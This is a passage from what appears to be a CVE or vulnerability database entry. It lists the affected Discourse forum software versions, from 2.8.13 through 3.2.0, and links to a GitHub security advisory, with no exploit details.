- Discourse>>Discourse >> Version 2.8.13 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.14 (Open CPE detail)
- Discourse>>Discourse >> Version 3.0.0 (Open CPE detail)
- Discourse>>Discourse >> Version 3.0.1 (Open CPE detail)
- Discourse>>Discourse >> Version 3.0.2 (Open CPE detail)
- Discourse>>Discourse >> Version 3.0.3 (Open CPE detail)
- Discourse>>Discourse >> Version 3.0.4 (Open CPE detail)
- Discourse>>Discourse >> Version 3.0.5 (Open CPE detail)
- Discourse>>Discourse >> Version 3.0.6 (Open CPE detail)
- Discourse>>Discourse >> Version 3.1.1 (Open CPE detail)
Discourse>>Discourse >> Version 3.2.0
- Discourse>>Discourse >> Version 3.2.0 (Open CPE detail)
References
https://github.com/discourse/discourse/security/advisories/GHSA-84gf-hhrc-9pw6
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
